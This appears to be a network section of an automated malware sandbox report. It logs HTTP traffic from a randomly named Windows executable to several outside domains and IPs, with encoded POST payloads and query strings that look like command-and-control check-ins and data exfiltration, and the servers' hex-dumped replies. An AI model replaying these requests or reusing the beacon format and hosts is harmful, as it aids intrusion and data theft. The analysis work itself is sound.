0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 50011 | 199.192.21.169 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:19:20.659512997 CEST | 442 | OUT | GET /6iok/?Yp=eXMH4fkp&nrs8j=Lr8I5vR8kZnO1BXwYoMTGZrf0zW9P9gXQAsQehgeDaNdyJVo64QKCUs+Z9VbQDUfL8+SUHVZNFYLvGD3PrMcSw81RdJBHrPngUHAq0ps+A4FRAxn/QrS6wg= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.cenfresh.life
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Oct 8, 2024 14:19:21.278870106 CEST | 995 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:21 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.4 | 50012 | 3.33.130.190 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:34.403327942 CEST | 724 | OUT | POST /paa2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.digitalbloom.info
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.digitalbloom.info
                                                                  Referer: http://www.digitalbloom.info/paa2/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 6e 42 70 54 63 48 49 73 34 6e 51 68 4b 2b 30 4e 63 45 48 36 46 63 68 6a 74 75 72 30 69 64 6d 57 66 45 4a 63 79 6d 46 49 6f 4e 53 32 66 76 70 75 6e 78 46 56 44 4e 59 72 6e 6c 38 4f 6f 30 5a 52 66 76 31 59 57 31 6a 2f 75 31 36 58 53 4b 45 4e 42 41 4e 53 52 59 33 75 37 4c 76 37 72 48 32 72 4e 4a 63 38 44 6c 78 38 36 39 67 73 71 44 31 38 65 49 38 51 35 34 5a 44 54 4f 61 5a 43 38 7a 6b 37 58 65 64 73 6e 58 73 7a 42 49 54 31 34 58 61 59 4b 31 65 34 2f 56 42 6e 5a 37 51 37 43 36 54 6b 6a 72 72 44 45 4b 6c 6a 70 4b 4d 4a 64 2f 52 73 65 42 50 78 48 49 64 75 59 37 62 39 2f 64 74 42 51 3d 3d
                                                                  Data Ascii: nrs8j=nBpTcHIs4nQhK+0NcEH6Fchjtur0idmWfEJcymFIoNS2fvpunxFVDNYrnl8Oo0ZRfv1YW1j/u16XSKENBANSRY3u7Lv7rH2rNJc8Dlx869gsqD18eI8Q54ZDTOaZC8zk7XedsnXszBIT14XaYK1e4/VBnZ7Q7C6TkjrrDEKljpKMJd/RseBPxHIduY7b9/dtBQ==


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.4 | 50013 | 3.33.130.190 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:36.946455002 CEST | 744 | OUT | POST /paa2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.digitalbloom.info
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.digitalbloom.info
                                                                  Referer: http://www.digitalbloom.info/paa2/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 6e 42 70 54 63 48 49 73 34 6e 51 68 4c 66 45 4e 50 6e 66 36 4f 63 68 67 75 75 72 30 6f 39 6d 53 66 45 56 63 79 6d 74 69 76 2b 6d 32 65 4c 68 75 6d 77 46 56 41 4e 59 72 76 46 38 4c 69 55 5a 4b 66 76 34 74 57 31 76 2f 75 31 75 58 53 4c 30 4e 55 6a 6c 64 51 49 33 67 76 37 76 31 68 6e 32 72 4e 4a 63 38 44 6c 56 57 36 38 49 73 74 7a 6c 38 66 70 38 54 36 34 5a 41 61 75 61 5a 52 73 7a 67 37 58 65 72 73 6d 62 57 7a 43 77 54 31 36 66 61 66 59 4e 5a 32 2f 56 48 34 70 36 6e 31 79 2b 62 71 53 43 44 4b 6c 4b 48 6b 49 71 2f 46 37 75 4c 39 76 67 59 6a 48 73 75 7a 66 79 76 77 38 67 6b 61 54 74 37 4c 62 37 34 4c 6c 51 5a 34 48 74 64 6e 47 48 75 75 37 6b 3d
                                                                  Data Ascii: nrs8j=nBpTcHIs4nQhLfENPnf6Ochguur0o9mSfEVcymtiv+m2eLhumwFVANYrvF8LiUZKfv4tW1v/u1uXSL0NUjldQI3gv7v1hn2rNJc8DlVW68Istzl8fp8T64ZAauaZRszg7XersmbWzCwT16fafYNZ2/VH4p6n1y+bqSCDKlKHkIq/F7uL9vgYjHsuzfyvw8gkaTt7Lb74LlQZ4HtdnGHuu7k=


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  11 | 192.168.2.4 | 50014 | 3.33.130.190 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:39.495529890 CEST | 10826 | OUT | POST /paa2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.digitalbloom.info
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.digitalbloom.info
                                                                  Referer: http://www.digitalbloom.info/paa2/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 6e 42 70 54 63 48 49 73 34 6e 51 68 4c 66 45 4e 50 6e 66 36 4f 63 68 67 75 75 72 30 6f 39 6d 53 66 45 56 63 79 6d 74 69 76 2b 2b 32 65 35 35 75 6e 54 74 56 42 4e 59 72 68 6c 38 4b 69 55 59 61 66 76 67 68 57 31 53 4b 75 33 57 58 54 74 49 4e 51 69 6c 64 65 49 33 67 77 72 76 30 72 48 33 68 4e 4a 4d 67 44 6c 6c 57 36 38 49 73 74 31 4a 38 59 34 38 54 38 34 5a 44 54 4f 61 64 43 38 7a 49 37 58 47 56 73 6d 66 47 7a 7a 51 54 30 5a 33 61 5a 74 5a 5a 36 2f 56 46 35 70 36 2f 31 7a 44 46 71 53 65 68 4b 6c 2b 39 6b 49 65 2f 56 39 6e 4a 35 73 6b 79 31 42 34 45 6d 64 71 4f 70 4f 31 6e 53 69 35 54 50 35 44 77 55 6d 49 6f 7a 6e 4d 68 6a 33 43 72 31 75 31 55 7a 36 52 39 4a 37 58 33 6c 6d 73 76 64 54 47 6b 72 6a 6e 4f 52 61 78 68 68 62 6b 53 30 6b 6f 31 73 32 4c 36 63 6d 5a 6a 6d 4f 2f 69 6d 57 4f 4a 66 6a 57 52 2f 4e 69 55 6a 76 79 52 71 30 6f 75 70 47 37 78 6c 2b 55 49 30 44 4b 55 64 61 6d 49 71 59 67 70 2f 73 58 47 39 75 2b 4b 36 59 32 35 66 50 35 44 72 38 35 51 58 71 7a 51 52 54 6b 58 31 43 42 34 [TRUNCATED]
                                                                  Data Ascii: nrs8j= [TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  12 | 192.168.2.4 | 50015 | 3.33.130.190 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:42.037537098 CEST | 446 | OUT | GET /paa2/?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.digitalbloom.info
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Oct 8, 2024 14:19:43.465883017 CEST | 393 | IN | HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Tue, 08 Oct 2024 12:19:43 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 253
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 70 3d 65 58 4d 48 34 66 6b 70 26 6e 72 73 38 6a 3d 71 44 42 7a 66 33 45 6d 38 46 4d 6e 44 75 5a 59 62 56 66 69 4c 35 73 6b 6e 5a 57 59 68 75 65 6f 54 30 46 34 72 30 39 68 68 39 44 43 62 4a 6f 48 71 43 4e 4e 42 2b 68 59 6f 47 31 55 73 33 56 72 64 4e 4a 51 65 57 6d 4b 76 33 43 43 54 62 67 77 48 33 4e 69 55 35 71 44 77 70 58 76 6c 6d 53 54 50 75 59 6d 61 77 56 41 73 50 77 55 6f 55 77 4c 62 37 34 6a 39 59 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI="}</script></head></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  13 | 192.168.2.4 | 50016 | 84.32.84.32 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:48.545311928 CEST | 724 | OUT | POST /pt4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.thepeatear.online
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.thepeatear.online
                                                                  Referer: http://www.thepeatear.online/pt4m/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 4e 78 69 7a 64 4c 6b 6f 38 66 54 37 41 45 46 65 66 66 5a 55 58 33 79 69 62 39 4f 4f 6a 31 6c 4e 71 61 31 37 4f 34 74 33 48 54 5a 34 61 33 72 7a 37 66 78 54 67 57 44 5a 4f 65 55 47 77 31 45 56 41 6c 5a 64 76 31 4f 46 51 4b 47 50 72 38 68 63 78 2f 31 47 71 61 33 47 70 36 67 52 58 6f 31 6b 55 68 61 66 69 73 6f 4f 64 69 4d 71 68 58 58 78 6b 2f 2b 77 62 38 47 50 62 4c 6b 79 39 69 50 55 79 64 72 58 72 52 5a 41 74 57 73 50 47 51 74 77 41 38 53 45 51 39 71 56 58 2f 67 4a 71 77 38 48 37 58 39 4b 44 7a 42 4c 54 53 78 54 53 76 50 41 41 43 34 6c 58 4e 65 70 70 5a 66 57 48 35 6e 55 5a 77 3d 3d
                                                                  Data Ascii: nrs8j=NxizdLko8fT7AEFeffZUX3yib9OOj1lNqa17O4t3HTZ4a3rz7fxTgWDZOeUGw1EVAlZdv1OFQKGPr8hcx/1Gqa3Gp6gRXo1kUhafisoOdiMqhXXxk/+wb8GPbLky9iPUydrXrRZAtWsPGQtwA8SEQ9qVX/gJqw8H7X9KDzBLTSxTSvPAAC4lXNeppZfWH5nUZw==


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  14 | 192.168.2.4 | 50017 | 84.32.84.32 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:51.084002972 CEST | 744 | OUT | POST /pt4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.thepeatear.online
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.thepeatear.online
                                                                  Referer: http://www.thepeatear.online/pt4m/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 4e 78 69 7a 64 4c 6b 6f 38 66 54 37 41 6b 31 65 64 34 31 55 66 33 79 74 56 64 4f 4f 31 46 6c 52 71 61 70 37 4f 35 59 73 48 68 39 34 61 53 58 7a 36 64 4a 54 73 32 44 5a 46 2b 55 44 2b 56 45 4f 41 6c 56 56 76 30 65 46 51 4a 36 50 72 35 4e 63 77 4f 31 46 72 4b 33 49 38 71 67 58 59 49 31 6b 55 68 61 66 69 73 38 6f 64 69 55 71 67 6e 6e 78 32 75 2b 2f 61 38 47 51 63 4c 6b 79 76 53 50 59 79 64 72 35 72 51 46 71 74 51 6f 50 47 56 4a 77 4f 4e 53 48 48 4e 71 58 49 76 68 49 36 41 42 49 2f 56 34 5a 48 79 35 70 64 78 6c 38 61 4a 65 61 52 7a 5a 79 46 4e 36 61 30 65 57 69 4b 36 61 64 43 34 36 6e 41 45 4a 55 36 38 50 36 43 69 49 6e 46 32 67 48 35 53 73 3d
                                                                  Data Ascii: nrs8j=NxizdLko8fT7Ak1ed41Uf3ytVdOO1FlRqap7O5YsHh94aSXz6dJTs2DZF+UD+VEOAlVVv0eFQJ6Pr5NcwO1FrK3I8qgXYI1kUhafis8odiUqgnnx2u+/a8GQcLkyvSPYydr5rQFqtQoPGVJwONSHHNqXIvhI6ABI/V4ZHy5pdxl8aJeaRzZyFN6a0eWiK6adC46nAEJU68P6CiInF2gH5Ss=


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                  15 | 192.168.2.4 | 50018 | 84.32.84.32 | 80
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:53.639532089 CEST | 10826 | OUT | POST /pt4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.thepeatear.online
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.thepeatear.online
                                                                  Referer: http://www.thepeatear.online/pt4m/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 4e 78 69 7a 64 4c 6b 6f 38 66 54 37 41 6b 31 65 64 34 31 55 66 33 79 74 56 64 4f 4f 31 46 6c 52 71 61 70 37 4f 35 59 73 48 68 31 34 5a 67 76 7a 37 38 4a 54 74 32 44 5a 47 2b 55 43 2b 56 46 63 41 6c 64 52 76 30 53 56 51 4d 2b 50 72 66 5a 63 34 63 64 46 6c 4b 33 49 2b 71 67 53 58 6f 31 78 55 6c 47 44 69 76 45 6f 64 69 55 71 67 6c 50 78 6d 50 2b 2f 58 63 47 50 62 4c 6c 39 39 69 4f 46 79 63 44 50 72 51 42 51 74 6a 67 50 47 31 35 77 44 66 4b 48 62 64 71 5a 4c 76 67 62 36 41 4d 49 2f 56 6b 56 48 79 64 54 64 77 64 38 59 39 54 54 45 68 6c 66 59 2f 58 44 6d 2f 37 45 45 59 65 69 4f 4a 32 37 49 6b 45 4d 71 4a 76 71 4e 6a 74 59 5a 6b 5a 46 6a 79 47 6f 4a 6a 78 6f 69 51 44 61 74 49 78 30 42 6c 74 70 36 71 67 47 45 68 4c 33 51 52 70 77 55 46 36 34 43 48 52 53 77 61 57 45 59 79 4f 6c 42 58 49 66 56 66 69 6b 36 47 79 6a 34 61 68 38 4e 62 77 4f 37 63 2f 52 63 6b 51 6b 5a 6f 30 67 6f 34 4a 4d 76 47 79 4d 34 56 45 6f 59 30 49 2f 30 55 30 75 69 4a 6d 41 67 6e 59 78 43 48 37 55 41 67 34 4b 55 51 30 52 [TRUNCATED]
                                                                  Data Ascii: nrs8j= [TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  16 | 192.168.2.4 | 50019 | 84.32.84.32 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 8, 2024 14:19:56.180372000 CEST | 446 | OUT | GET /pt4m/?nrs8j=AzKTe9sU/un6FWh8J4Z/TBPHes/wm2VwkqZ8OIQkGxADXwK45dBXsHOALtRz338sDHJ9qmiySJX4ofZpl75YgKir24cXfpRpIxKZjJwadTshiHDArMKxe74=&Yp=eXMH4fkp HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.thepeatear.online
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Oct 8, 2024 14:19:56.641262054 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                  Server: hcdn
                                                                  Date: Tue, 08 Oct 2024 12:19:56 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 10072
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  x-hcdn-request-id: 37d6ba98a8476778d23f4616ee078109-bos-edge4
                                                                  Expires: Tue, 08 Oct 2024 12:19:55 GMT
                                                                  Cache-Control: no-cache
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                  Oct 8, 2024 14:19:56.641294003 CEST | 1236 | IN | Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                  Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                  Oct 8, 2024 14:19:56.641304016 CEST | 1236 | IN | Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                  Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                  Oct 8, 2024 14:19:56.641315937 CEST | 1236 | IN | Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                  Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                  Oct 8, 2024 14:19:56.641328096 CEST | 1236 | IN | Data Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                  Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
